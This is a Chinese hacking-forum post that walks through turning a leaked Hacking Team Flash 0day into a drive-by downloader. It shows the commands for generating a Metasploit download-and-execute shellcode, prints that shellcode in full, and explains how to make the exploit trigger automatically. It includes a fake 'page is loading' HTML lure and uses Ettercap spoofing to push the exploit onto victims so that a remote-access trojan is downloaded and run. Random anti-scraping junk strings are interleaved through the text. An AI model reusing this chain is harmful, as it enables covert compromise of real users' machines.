找回密码
 立即注册
查看: 2275|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- s& I0 h" q$ x6 B X; \; q 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 |% G, a. H% i8 J

2 A" [. ?, p% ]- {" i$ j

; G! T" `9 \% |6 n& Y2 K 利用到的工具: * M ^' r- \9 d7 j

6 z) A8 b" p& P" i0 J. b1 l, I1 O

5 |. p% m, q( @* f6 f. w Msf 1 J. [: ?" Z& w1 |

$ L( X8 C2 Z H& z, W: s9 P

* e( U8 X2 B6 h# U6 T* {$ Z z Ettercap ( S+ i8 u( `' T; f$ T( e* j

: P2 `5 }- e5 X# H2 M- N0 w2 Y

1 x& }4 m) i/ y& n4 w Adobe Flash CS6 ( u7 L+ W6 m' a$ q# i% ~& J3 ]

" f Y6 Q' b& W5 \

* a" O/ O& J, |/ \ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 + s% E4 e; W: U3 s3 W

% s f* C& [, P/ ~4 S

' D0 v7 {. Y: a/ m5 f) f6 x2 | 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ' r1 n9 P0 G6 Z! x( G" o k

7 \/ |4 D/ |2 [" p, a

7 V! B2 n2 ]# R( f& w7 m 如图: 5 ?9 |. \, x) |% k+ V: x

! y) ^. i4 C- C5 H

3 z R* y' s7 J' ?   3 E0 `0 m6 U( g6 E0 C. U$ r' \

( ^6 x# M ^8 H% u

# g3 {& U/ b9 r+ F! \# f- a$ k   5 b% p9 [ v& P4 m* Y% O& D* U

& T2 }+ G1 y `" N0 ?: f0 V

$ A3 A, l' C4 W0 I& \* Z 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: - R& D! m" E( j7 F, Z Q

" W7 L, E; {1 @

2 [5 q1 v* }$ I9 {5 N% `5 W7 S   : i) g0 q- W" g7 u9 ^+ o0 L

( d, d* Z$ E5 k

; i3 n8 e+ ]. H" I9 G   3 k& y0 _! V: M: C9 s& o

m9 [! K: x- p

( {7 S- `2 u" L3 Q( Q1 R 然后执行generate -t dword生成shellcode,如下: 6 {3 h" d. [1 L8 h c* u, {

: H U2 s: H V0 O* j

% @( m( h6 s8 L( ]% w* i. ^& z7 s   8 M k/ Z$ l- d+ t" L

* P- N. y- m9 [& D" G" x0 t

' T- \+ |4 u* f 复制代码到文本下便于我们一会编辑flash exp,如下: 8 }% W2 S4 x+ W

# C! E" K0 Y3 _: h7 k

3 z. ]% S* I" a" `- D4 H- a 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 @! d) ~1 X/ Q. L& d2 a' W

; t: R5 h+ E4 B, Y9 o5 f' `

9 E4 c; w0 w& | 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 J( S5 L8 I! o

o2 U/ g' p1 z2 |/ u8 q9 g$ a

6 F, x/ C4 M/ w, x4 N" E 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ! O1 F1 r" k0 P

. J7 y" ]/ w7 D. k

, @) y! B& X: \" A& @0 y 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 F. w- A# q0 D* j, B5 y) u# V

- y+ D2 ?) ~" a C P

! P* [5 H9 D" ?* N7 J0 p$ _4 Z& Z 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, $ d- x/ R i9 R' c1 x# f( ?

% L- A/ ^" V; C1 \! k4 Z

% O& ~3 P v$ {/ f& U 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 1 G+ S8 p- r$ r, F7 U

! d) z4 u1 {; }, `: ^9 l# u/ K

9 W1 i6 H! X# V. i/ L* M 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 7 b7 T n0 l4 C8 q. U" o5 h

" Z( B- U; O8 n0 r7 k

+ {2 Y& S- p. T: G0 a4 r! W) o( Z 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, + ]% l2 m' V5 Y

. o# \, P& Y! O' w! @% j

4 d8 b1 v) c/ n8 K7 T9 p9 H5 R' k 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 0 F* o+ y- U' V

! [0 S8 p7 w# G

1 e* M; F8 }- E) v 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 0 a; X# Q' D- M8 {7 V; a

7 L; m) T8 P* x5 l) @. G. N. a+ z$ Q' W

1 T& X0 \7 L* v3 n 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # S# l. u6 w+ p3 X( F* N

) _% p" g: a Q4 z3 }

* A" Q {* t# n S4 W/ b8 F 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , o& {/ W3 y* n) `5 \

1 Q5 m- R! h8 g8 ^

/ f1 V" a& r8 f" |. X! n, x! K 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 8 T( B9 D7 @7 Y# [$ y) I. R H8 A

" Y, I3 w) F9 v; r* H+ e4 M

- t9 W; I4 k% @1 t/ W- K: C0 f8 k 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 . d* N' v- Y/ Z! x5 m0 v

7 j+ o/ c4 m+ e; m; g. r0 A) W! t/ ?

% n: d; X: P$ k- K+ ?   ; `. f. l" O. V8 `5 |

7 a d/ o7 [; I# f6 h% }

4 b" D: I0 o) c5 b) K   8 y4 J1 K( B9 T b

: E- x: M2 W' O; b, p1 y

3 R0 V; C0 m9 ?& i; Y8 f 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 5 B u2 n& K7 S

$ [9 m$ s7 y) G5 r! E% p% T

5 `, O0 u- I, y- n3 a+ d& @% H* `   9 [# ] B3 e$ e( q+ W" K

5 E( f* H0 w# D7 h1 R

4 H9 u g# L ]$ Y% s; x) F3 p 先修改ShellWin32.as,部分源代码如图: # o/ U& I. Y1 n$ x

! _3 e1 H. v: t1 Q7 ~- q7 r$ D

" R% l0 ]8 w. n, @   : k! l# y5 w+ d6 Z' j3 l

8 e: F) f% l- y' l1 T' I

* V/ g: m+ @# f( ]" F+ t 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 5 ~5 ^8 {/ `6 ?; V* X$ u8 @6 p; |

K9 e% Z6 T* j/ F4 D- v

6 A/ x# \! x2 Z   5 S. @: @5 u S$ \6 {

7 |2 v. D. O4 p+ I6 u, L

) `$ S1 j6 l4 p# V9 R 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: i% N: R: }# Z) E- Y/ a/ n+ b

4 g8 W( }4 r& u+ W8 G

& N' @* \, F- S1 l& m8 L   0 k; ]! ]- F% p

3 H6 a! k8 i. A- ~& C8 Q

, p# j' r* F& i2 y 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 8 Y' S6 `$ b% h1 s8 {; w% @

( z; }4 H0 s5 _. l# M

: J- K$ T* \0 M' ?4 v1 @   d) Q+ A, Y( }( F

: y: A2 Z4 z( F) r! k

( k# I8 Y3 ~6 ?   6 d7 s. M9 c& r

; a; i9 W5 o6 _7 R/ Z$ Z! [: m* Y

# J- u y1 U; p! s( Z2 o' j p   - T) c: i$ E/ ]3 }7 M: @, A' z( H

; r `( W( m2 H0 V; x% k" C

$ W& R# ?2 G1 ~! _% I 然后点保存,下面我们来编译一下,打开 $ }. s, u5 _8 x4 W# U8 P& I: D! Q

( ]: R" T4 N0 I: Y

Q0 M- s: r' ~) o: {$ V6 c exp1.fla然后点文件-发布,看看编译没错误 6 _+ L( h. j! f% I# R! c/ w

5 ]6 S5 E+ ^8 q6 l

# o! {" a* |$ `5 o   4 F1 Q' W1 O. D* f- ]. z; ]$ [

6 W/ P$ N& F2 d* N0 }

& a8 M' J$ w" X9 B5 c   2 O) G( h- L5 F

: e% W# Z' P* @, N

7 M$ v. U: D. F0 ^   0 E! u; B1 t3 ?' {( C

7 h2 s) A. W; p7 N7 f$ _, V; U/ t* a

+ u& T4 M5 O }) h# E   ; R) \: u1 p( i8 e' n, c* X

% F+ N' i$ {- l6 t5 s) [. H

- ^& I! T4 o5 Z$ m) [& w 然后我们把生成的 $ [) m( U/ S& m1 V3 h% d

h3 I2 I2 L0 c, \

! W5 E+ p" `$ j- T! U+ S exp1.swf丢到kailinux /var/www/html下: / r: |4 N; a0 i, |# j; o

" c9 |6 h1 j# ]' K9 q% _+ K

' j2 O4 B9 n0 a! C. L 然后把这段代码好好编辑一下 % e: `* `- O+ ?6 @: ?+ J+ V) `$ Y

8 e. b: J! O" W, f& b4 F

7 s9 G- ?, d4 Z1 J   7 {, X" X* F! k) i: P$ R

2 u0 ] V6 V3 ]2 l: U

6 }, }/ F" O% w& ]5 f' r   # U( n5 }: z4 G7 [. v" P

4 _2 _- g2 F# \: v" C6 N

. s/ e; k7 J% R8 Q0 Z% R   4 U$ u( s l# i; ?0 M2 N: K$ |; M

% W; N3 ]/ N0 `9 g

% A# u5 r0 X# [$ q   # H w& G9 n+ ?% C; Q

2 X2 a y3 y( q/ j& \

! w% ?- U% T9 U, {   " q% d: ^0 B) s$ D9 K" l7 U

: c4 I, e6 i% M' `- S

M) t j B4 R. U9 K4 G8 X   6 T8 K& n' ?) [4 E; H$ Z

' F8 p$ C* O8 M$ Z, N9 y8 Z4 g" `* a

( ] J$ F- U; [) I <!DOCTYPE html> : ^5 C6 ~+ ^. s, ?* Q$ T: P9 k' y

# M- g! \% |8 {2 v; z" j

4 ^- p1 Z( n8 B& x <html> * }* b# U. Q2 Y1 z! }9 V; R0 H9 c' b

% _4 D: u9 g( n( L9 I! B+ e" T

- s# H' L, P3 N <head> ' E; a/ Z- k+ L( e8 t5 k2 d) d

/ u8 P2 g0 z+ i' X' t

, w( V; V% q+ K+ D <meta http-equiv="Content-Type" content="text/html; ( O& G* v4 w5 D# p. j

0 _6 R, j- n; w( @

( Z% a R. [* `( O: ^3 j7 X charset=utf-8"/> 9 }: j' p" Z2 N, I! f$ j' m# d! F. w6 o

1 N5 x, m9 ~4 z! D% R( b

$ {2 Z/ Q+ B; }% d </head> ) h) E! g6 x" r |* a

3 r; T$ a/ K0 s; b: R

* Y# Z7 k& f- K) s <body> : O8 A# G" ~4 e% R

9 t) {% V; y! ~( V8 L

4 t! U8 C. y) \. J <h2> Please wait, the requested page is loading...</h2> ; n# t3 e/ |3 P8 h

) q7 j% C2 E3 w. i$ r3 w4 S$ t; v

6 j: E; Q: D8 n0 M. } <br> 1 `, k+ f Y* t) E Q6 m

! x9 W+ W9 i% }) f* w4 F0 Z

# s/ g" z# L( s8 x0 q+ q- V& S, ?" A <OBJECT 2 V$ ]$ u: I. O+ ?; l* _8 m

+ O: |8 G) p- w: Z9 X

) Z$ ^, Y5 O2 f: k4 D classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ; \" S5 i1 ~# C+ n# \7 s' Y

" c9 ]3 L8 R S0 O

1 A+ X" Z* x' H$ F VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 6 W4 b# C" l4 q8 B. q+ j

" k# Y5 t, r5 p

8 W3 W# |3 n! ^8 ^! M" m% j </body> - U8 F- O( l1 ]. T4 f0 Q

7 r" m# J7 @5 U

1 c. g7 o- z9 p# ?; T <script> 9 ~4 p/ C% l; @

: f9 W, |. T# l7 |3 _

0 X8 E; x4 o! a: ~5 D F     setTimeout(function () { - Y$ g' ~, J4 j$ r$ y: Z& {

4 R: Y' e# ^- Q) H5 ?. e

1 l( M% v M, y6 [1 c+ z) f          . x. S) f; h* b/ C% q

, w4 ]" O8 P5 ?

2 Q* W; t' E/ H4 u/ L: e! Q: \ window.location.reload(); i- t9 a- h7 G8 n6 o! p

. }6 b8 }6 T+ n; [

5 P5 @5 d! x$ J7 k5 ~     }, 10000); " | q" D" U4 G, l7 E+ e; e

6 U8 L& U! @0 C6 a9 o- F

+ W: T5 [: }& O. k' Y* O   & j& }& |/ \% v4 y* r

( ]/ F2 j5 ?2 `; |

. I) u: P. P" Y7 O4 _1 y6 f </script> " y I7 J- ^! r8 C2 h

* n" Y! q' z. r0 `; e" x. n

# f) |) R% y: E9 }* i </html> ! @5 P6 b6 P$ ^: U3 M- B+ Y

3 {7 p# ^. o9 S" o1 |6 D

5 N2 C% K7 i5 ^# @$ X+ H   V8 {% D$ o) s+ C4 U5 j& N

6 V" a: k( x% h+ X4 ~! u: ]

9 @0 L$ X' c8 a8 r: K9 d% _ 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ( x+ x; s+ u+ `6 Z1 {

3 T- r( ?- {: J# @ r. X

- n# g3 ?% l+ [8 Q0 k   + f+ W3 j$ g; f: L" u% \! Q

: ^) h4 a3 M, l/ T$ B

$ B' {( v5 P2 ]' u* S7 d$ W   / D5 W1 a; d0 F! [5 E8 w# [

) B3 l7 S1 y W% \" \

$ Z3 z& a S; u. y: c; z0 z M. m   4 R7 O& J: _7 m Z" s( D4 [

/ T A2 Z, {0 K+ h ?* Q& x0 j

$ Z5 d, I1 ?0 B0 q. l' L4 j, a   : ~5 r' S; q$ L8 E9 h2 w" R; m+ k5 w; m

! b+ \: r+ @6 x

/ I. Z/ a( \; Y- D   8 |6 j; e- p" D- R8 G" s* X

( f |4 H) {2 ~

. @0 J: v* u7 J) Q4 | 下面我们用ettercap欺骗如图: 8 U% {; N& ^# U# ?- v) C1 L# ?

: ?" i5 m# |/ p1 r; |0 H

7 L9 u T3 l& E' q& Y2 o   8 y5 n0 a2 l3 f# W; V3 r8 X7 N; W

3 f4 ?$ j' i* x9 Y6 o* a, p( t

2 q# w. K0 c5 S   1 s0 r" x( _$ y6 B2 `' h

- D" B; z. \" E, C

" V0 p$ S: G3 T9 O) I; Q' R" A 下面我们随便访问个网站看看: , o3 f! s4 \; Z' ]* H% k

0 \2 ^) U3 X- `& z

9 u8 S) o% Y3 N, Q M7 M 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 4 }3 j( Y @' J; n7 G' A, E

: h; @5 F8 r3 @+ J o

6 G% }( m5 F- P   4 g, s: f, h) B% V4 H+ N

4 d' ^% M5 y# ? Y

3 k3 v! f, G7 b o2 G R4 m y9 s 我们看另一台, ) |4 ]' {$ B% a9 i5 M! @

0 e$ O5 D4 H% y

8 d! S L3 x9 ~& m: v 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 " H1 x5 ` A7 ~+ h& J

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表